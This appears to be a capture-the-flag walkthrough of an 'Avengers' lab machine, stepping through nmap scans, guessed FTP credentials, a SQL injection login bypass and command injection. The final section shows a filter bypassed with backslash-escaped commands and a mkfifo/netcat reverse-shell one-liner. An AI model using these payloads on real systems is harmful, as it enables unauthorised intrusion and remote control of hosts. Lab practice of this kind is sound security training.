[Task 1] Deploy
Let’s enumerate machine
- Scan ports
nmap -Pn <ip>
2. Scan everything
nmap -A <ip>
3. Scan for vulnerabilities
nmap --script vuln <ip>
4. connect ftp
nc <ip> <port>
5. connect ssh
ssh <ip>
6. Explore site port 80 with google-chrome
I like to use Chrome because It has more functionality for inspecting web app.
Installation guide: https://www.tecmint.com/install-google-chrome-on-kali-linux/
Open Chrome
google-chrome --no-sandbox
A user hint to something, here’s the list of my guessing
- groot:iamgroot
- iamgroot:iamgroot
- groot:groot
View page source
8. Follow the link
[Task 2] Cookies
- On the deployed Avengers machine you recently deployed, get the flag1 cookie value.
Right-click to inspect element
At Storage → Cookies, there’s cookie
Click to see the details
[Task 3] HTTP Headers
- Look at the HTTP response headers and obtain flag 2.
Click at network tab and refresh site to capture all requests
[Task 4] Enumeration and FTP
- Look around the FTP share and read flag 3!
I will use the list of groot’s possible credentials
- groot:iamgroot
- iamgroot:iamgroot
- groot:groot
ftp <ip>
I use username:password as groot : iamgroot. Luckily, I passed at first attempt.
lscd filesls
Read flag3.txt, find available commands
get flag3.txt
Back to our machine
cat flag3.txt
[Task 5] GoBuster
- What is the directory that has an Avengers login?
I don’t like gobuster. I’ll use dirbuster instead.
Explore each link, I find something at “/portal/”
[Task 6] SQL Injection
- Log into the Avengers site. View the page source, how many lines of code are there?
View source
Inspect element
Input data in both fields
' or 1=1--
[Task 7] Remote Code Execution and Linux
- Read the contents of flag5.txt
Try command
cd ..;ls
cd ..;cat flag5.txt
cd ..;less flag5.txt
**UPDATE 7/5/21**
Get the reverse shell
Supply an input
Read create.sql
cat create.sql
Bypass filter
c\a\t create.sql
Plus, you also got flag4
Read server.js
c\a\t server.js
You will see which commands are banned.
Reverse shell command
Prepare listener
rlwrap nc -lvp 443
Supply the command
From this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f
to this
r\m /tmp/f;mkfifo /tmp/f;c\a\t /tmp/f|/bin/s\h -i 2>&1|n\c 443 >/tmp/f
Back to the listener, now I got the shell